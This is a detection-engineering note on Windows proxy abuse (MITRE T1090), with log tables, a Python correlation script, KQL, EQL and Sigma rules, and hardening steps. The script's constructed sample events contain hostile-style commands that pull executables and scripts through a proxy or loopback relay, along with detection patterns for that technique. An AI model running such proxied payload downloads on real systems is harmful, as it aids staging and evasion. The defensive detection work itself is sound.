This note documents detection patterns for proxy abuse (MITRE ATT&CK T1090) in Windows environments: an operator reconfiguring the WinHTTP or user proxy, or pointing a proxy-aware tool at a relay, in order to stage payloads, beacon, or exfiltrate data.
Direct Indicators
| Log | Event ID | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Sysmon | 3 | Network connection | Critical | Outbound connections from proxy clients or proxy-aware tools; loopback connections to a local relay also land here. Requires a NetworkConnect rule in the Sysmon config. |
| Security | 4688 | Process creation | Critical | Proxy tooling and proxy-enabled commands. Command-line auditing must be enabled, otherwise CommandLine is empty and the patterns below do not fire. |
| Sysmon | 1 | Process creation | Critical | Best lineage source (parent, user, hashes) for proxy abuse chains. |
| Sysmon | 13 | Registry value set | High | Proxy values written under Internet Settings. Requires a RegistryEvent rule covering that key. |
| Sysmon | 22 | DNS query | High | Resolution of proxy hosts and relays. |
| PowerShell | 4104 | Script block logging | Critical | Proxy objects and -Proxy parameters inside scripts are visible here even when the command line is obfuscated or encoded. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Proxy registry changed | ProxyServer, ProxyEnable or AutoConfigURL written under Internet Settings | Critical | Core proxy abuse primitive. |
| netsh winhttp set proxy | System (WinHTTP) proxy altered; used by services and system components | Critical | Strong signal; `show proxy` alone is benign reconnaissance. |
| curl / bitsadmin uses proxy | Transfer tool launched with -x/--proxy, or proxy settings applied to a BITS job | Critical | Common operator path for exfil or staging. |
| Unusual outbound via local proxy | Connections to 127.0.0.1 on a proxy port (localhost relay) | High | Stealth clue; the real destination is hidden behind the relay. |
| Proxy immediately before download | Proxy set, then a transfer tool runs within minutes | Critical | High-confidence staging chain. |
| Proxy reverted after use | netsh winhttp reset proxy, or ProxyEnable cleared, shortly after the transfer | High | Cleanup behavior; sign of a skilled operator. |
Common Tools
| Tool | Usage |
|---|---|
| netsh | WinHTTP proxy config |
| PowerShell | Proxy object creation (System.Net.WebProxy, DefaultWebProxy) and -Proxy parameters on Invoke-WebRequest |
| curl.exe | Proxy-aware transfer (-x / --proxy) |
| bitsadmin | Proxy-aware staging (/setproxysettings on a job) |
Relevant Artifacts
- Sysmon Event IDs 3, 1, 13, 22
- Security Event ID 4688
- PowerShell 4104
- Registry paths:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings (user proxy: ProxyServer, ProxyEnable, AutoConfigURL)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings (WinHTTP proxy written by netsh)
- Commands:
netsh winhttp set proxy
netsh winhttp reset proxy (cleanup)
netsh winhttp import proxy source=ie (copies the user proxy into WinHTTP)
- Prefetch:
NETSH.EXE, CURL.EXE and BITSADMIN.EXE prefetch files (C:\Windows\Prefetch\NETSH.EXE-*.pf, CURL.EXE-*.pf, BITSADMIN.EXE-*.pf); last-run time and run count date the activity
MITRE ATT&CK References
- T1090 Proxy
- T1090.001 Internal Proxy (localhost or internal relay)
- T1090.002 External Proxy
Decision Tree
- Which proxy type?
  - WinHTTP (netsh winhttp; used by services and system components)
  - User proxy (Internet Settings in HKCU; used by browsers and WinINet clients)
  - Tool-level proxy (curl -x, Invoke-WebRequest -Proxy, BITS job settings)
- Registry or command?
  - netsh
  - PowerShell
  - Registry edit
- Follow-on action?
  - Download
  - Beacon
  - Exfil
- Reverted later?
  - Yes
  - No
- Expand:
  - DNS
  - Outbound chain
  - Payload path
- Scope:
  - Single use
  - Persistent relay
  - Campaign behavior
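The indirect indicators above and the decision tree are easiest to read as one correlation pass per host: classify each event as a proxy set, a proxy reset, or a transfer; then, for each set, look for a transfer inside a short window (the staging chain), a matching reset later (cleanup), and a loopback target (local relay). The Python below is an added example written for this note, not code from the original page. The events are constructed dicts that imitate the fields of Security 4688, PowerShell 4104 and Sysmon 1/3/13 records (4688 NewProcessName is mapped to Image), the host names, SID, and IP addresses are made up, and `KNOWN_PROXIES` is a placeholder for an environment's sanctioned proxies.

```python
"""Correlate proxy-configuration changes with follow-on transfers.

Added example for this note, not code from the original page. Events are
constructed dicts that mimic Security 4688, PowerShell 4104 and Sysmon 1/3/13
fields (4688 NewProcessName is mapped to Image); they are not real telemetry.
"""
import re
from datetime import datetime, timedelta

KNOWN_PROXIES = {"proxy.corp.local:3128"}  # assumption: sanctioned proxies (placeholder)
TRANSFER_TOOLS = {"curl.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe"}
CHAIN_WINDOW = timedelta(minutes=5)    # proxy set -> download / connection
REVERT_WINDOW = timedelta(minutes=30)  # proxy set -> reset (cleanup)

# netsh winhttp set proxy [proxy-server=]"host:port" | reset proxy | import proxy source=ie
NETSH_RE = re.compile(r'netsh\s+winhttp\s+(set|reset|import)\s+proxy(?:\s+(?:proxy-server=)?"?([^\s"]+))?', re.I)
# User proxy values under ...\Internet Settings (Sysmon 13 TargetObject)
REG_RE = re.compile(r"\\Internet Settings\\(ProxyServer|ProxyEnable|AutoConfigURL)$", re.I)
# Proxy object creation inside a script block (PowerShell 4104)
PS_PROXY_RE = re.compile(r"""(?:System\.Net\.WebProxy|DefaultWebProxy)[^'"]*['"]([^'"]+)['"]""")
# Tool-level switches: curl -x/--proxy, Invoke-WebRequest -Proxy, bitsadmin /setproxysettings <job> OVERRIDE <list>
TOOL_PROXY_RE = re.compile(r"(?:\s-x\s+|\s--proxy\s+|\s-[Pp]roxy\s+|(?i:/setproxysettings)\s+\S+\s+(?i:override)\s+)(\S+)")
DOWNLOAD_RE = re.compile(r"https?://|/transfer|Invoke-WebRequest|DownloadFile|-OutFile|\s-o\s", re.I)


def proxy_host(target):
    """Host part of 'host:port', 'http://host:port' or 'http=host:port;https=...' forms."""
    t = target.strip("\"'").split("://")[-1].split("=")[-1]
    return t.split(":")[0].lower()


def is_loopback(target):
    return bool(target) and (proxy_host(target) == "localhost" or proxy_host(target).startswith("127."))


def classify(ev):
    """Map one event to {kind: set|reset|transfer, proxy_type, method, target}, or None."""
    eid, cmd = ev["EventID"], ev.get("CommandLine", "")
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if eid in (1, 4688):
        m = NETSH_RE.search(cmd)
        if m:  # 'show proxy' does not match and is ignored
            action = m.group(1).lower()
            return {"kind": "reset" if action == "reset" else "set", "proxy_type": "WinHTTP",
                    "method": "netsh", "target": (m.group(2) or "") if action == "set" else ""}
        if image in TRANSFER_TOOLS:
            pm = TOOL_PROXY_RE.search(cmd)
            if pm or DOWNLOAD_RE.search(cmd):
                return {"kind": "transfer", "proxy_type": "Tool-level" if pm else "",
                        "method": image, "target": pm.group(1).strip("\"'") if pm else ""}
    elif eid == 13:
        m = REG_RE.search(ev.get("TargetObject", ""))
        if m:
            value, details = m.group(1).lower(), ev.get("Details", "")
            off = value == "proxyenable" and details.lower().endswith("(0x00000000)")  # proxy switched off
            return {"kind": "reset" if off else "set", "proxy_type": "User",
                    "method": "registry", "target": "" if value == "proxyenable" else details}
    elif eid == 4104:
        m = PS_PROXY_RE.search(ev.get("ScriptBlockText", ""))
        if m:
            return {"kind": "set", "proxy_type": "User", "method": "PowerShell", "target": m.group(1)}
    elif eid == 3 and image in TRANSFER_TOOLS:
        return {"kind": "transfer", "proxy_type": "", "method": image,
                "target": f"{ev.get('DestinationIp', '')}:{ev.get('DestinationPort', '')}"}
    return None


def correlate(events):
    """Per host: proxy type/method, follow-on transfer (chain), later revert, loopback relay."""
    acts = [{**c, "ts": e["ts"], "host": e["Computer"]}
            for e in sorted(events, key=lambda e: e["ts"]) if (c := classify(e))]
    findings, tied = [], set()
    for i, a in enumerate(acts):
        if a["kind"] != "set":
            continue
        f = {"host": a["host"], "ts": a["ts"], "proxy_type": a["proxy_type"], "method": a["method"],
             "target": a["target"], "chain": False, "reverted": False,
             "local_relay": is_loopback(a["target"]), "level": "medium"}
        for j in range(i + 1, len(acts)):
            b, dt = acts[j], acts[j]["ts"] - a["ts"]
            if b["host"] != a["host"]:
                continue
            if b["kind"] == "transfer" and dt <= CHAIN_WINDOW:
                f["chain"], f["level"] = True, "high"
                tied.add(j)
            elif b["kind"] == "reset" and b["proxy_type"] == a["proxy_type"] and dt <= REVERT_WINDOW:
                f["reverted"] = True
        findings.append(f)
    for j, b in enumerate(acts):  # tool-level proxy use with no preceding config change
        if b["kind"] == "transfer" and b["proxy_type"] and j not in tied \
                and b["target"].split("://")[-1] not in KNOWN_PROXIES:
            findings.append({"host": b["host"], "ts": b["ts"], "proxy_type": b["proxy_type"],
                             "method": b["method"], "target": b["target"], "chain": True, "reverted": False,
                             "local_relay": is_loopback(b["target"]),
                             "level": "medium" if is_loopback(b["target"]) else "low"})
    return findings


T0 = datetime(2026, 3, 7, 10, 0, 0)
def _ev(offset_s, host, eid, **fields):  # constructed sample event
    return {"ts": T0 + timedelta(seconds=offset_s), "Computer": host, "EventID": eid, **fields}

SAMPLE_EVENTS = [  # constructed, not real telemetry
    _ev(-3600, "WS01", 4688, Image=r"C:\Windows\System32\netsh.exe", CommandLine="netsh winhttp show proxy"),
    _ev(0, "WS01", 4688, Image=r"C:\Windows\System32\netsh.exe",
        CommandLine='netsh winhttp set proxy proxy-server="10.0.0.5:8080" bypass-list="<local>"'),
    _ev(2, "WS01", 13, Image=r"C:\Windows\regedit.exe", Details="127.0.0.1:8080",
        TargetObject=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer"),
    _ev(90, "WS01", 1, Image=r"C:\Windows\System32\curl.exe",
        CommandLine=r"curl.exe -x http://10.0.0.5:8080 -o C:\Users\Public\t.exe http://198.51.100.7/t.exe"),
    _ev(91, "WS01", 3, Image=r"C:\Windows\System32\curl.exe", DestinationIp="10.0.0.5", DestinationPort=8080),
    _ev(240, "WS01", 4688, Image=r"C:\Windows\System32\netsh.exe", CommandLine="netsh winhttp reset proxy"),
    _ev(3600, "WS02", 4104, ScriptBlockText="[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy('http://127.0.0.1:9050'); (New-Object Net.WebClient).DownloadFile('http://198.51.100.9/s.ps1', 'C:\\Users\\Public\\s.ps1')"),
    _ev(3601, "WS02", 3, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", DestinationIp="127.0.0.1", DestinationPort=9050),
    _ev(7200, "WS02", 4688, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        CommandLine='powershell.exe -c "Invoke-WebRequest -Uri http://intranet.corp.local/x -Proxy http://proxy.corp.local:3128"'),
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['ts']:%H:%M:%S} {f['host']} {f['level']:6} {f['proxy_type']}/{f['method']} "
              f"target={f['target'] or '-'} chain={f['chain']} reverted={f['reverted']} local_relay={f['local_relay']}")
```

On the sample, WS01 yields two high findings (the netsh WinHTTP change, chained to the curl transfer and reverted four minutes later, and the registry ProxyServer write pointing at a loopback relay); WS02 yields one (a PowerShell proxy object aimed at 127.0.0.1:9050 followed by a connection to it). The earlier `netsh winhttp show proxy` and the later Invoke-WebRequest through the sanctioned corporate proxy produce nothing, which is the false-positive boundary the Sigma rule's `falsepositives` entry refers to.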
Example Detection Templates
KQL
SecurityEvent
| where EventID == 4688
| where NewProcessName endswith "netsh.exe"
| where CommandLine has "winhttp" and CommandLine has "proxy"
| where CommandLine has_any ("set", "import", "reset")
| project TimeGenerated, Computer, Account, ParentProcessName, CommandLine
Sysmon
| where EventID == 13
| where TargetObject has "Internet Settings"
| where TargetObject has_any ("ProxyServer", "ProxyEnable", "AutoConfigURL", "WinHttpSettings")
| project TimeGenerated, Computer, Image, TargetObject, Details
EQL
process where process.name == "netsh.exe" and process.command_line like~ "*winhttp*set proxy*"
sequence by host.name with maxspan=5m
  [ process where process.name == "netsh.exe" and process.command_line like~ "*winhttp*set proxy*" ]
  [ network where process.name in ("curl.exe", "bitsadmin.exe", "powershell.exe") ]
Sigma
title: Proxy Abuse Detection
id: 2d4b8f16-3c9a-4f61-8e2b-7a5d0c1e9b44  # placeholder; generate a fresh UUID v4 before deploying
status: experimental
description: Detects the WinHTTP proxy being set or imported via netsh, a common staging step before a proxied download or beacon
references:
  - https://attack.mitre.org/techniques/T1090/
author: Vergil
date: 2026-03-07
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: '\netsh.exe'
  selection_cmd_set:
    CommandLine|contains|all:
      - 'winhttp'
      - 'set proxy'
  selection_cmd_import:
    CommandLine|contains|all:
      - 'winhttp'
      - 'import proxy'
  condition: selection_img and 1 of selection_cmd_*
fields:
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Legitimate proxy administration (deployment scripts, help-desk sessions)
level: high
tags:
  - attack.command_and_control
  - attack.t1090
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Alert on proxy changes | netsh set/import proxy and WinHttpSettings writes | Critical | Core visibility; low volume outside deployment windows |
| Watch Internet Settings writes | Sysmon 13 on ProxyServer, ProxyEnable, AutoConfigURL | High | Low noise once browser and policy-driven writes are baselined |
| Correlate proxy + transfer | Proxy change followed by curl, bitsadmin or PowerShell download within minutes | Critical | Strong triage signal; turns a medium alert into a high-confidence chain |
| Restrict netsh usage | AppLocker or WDAC rule for netsh.exe outside admin sessions | High | Prevents interactive reconfiguration; check legitimate admin scripts first |
| Lock user proxy settings | GPO "Prevent changing proxy settings" plus a managed PAC/WPAD | High | Removes the registry primitive for standard users |
| Preserve 4104 | Script block logging retained and forwarded | High | Catches scripted proxy setup that never appears on a command line |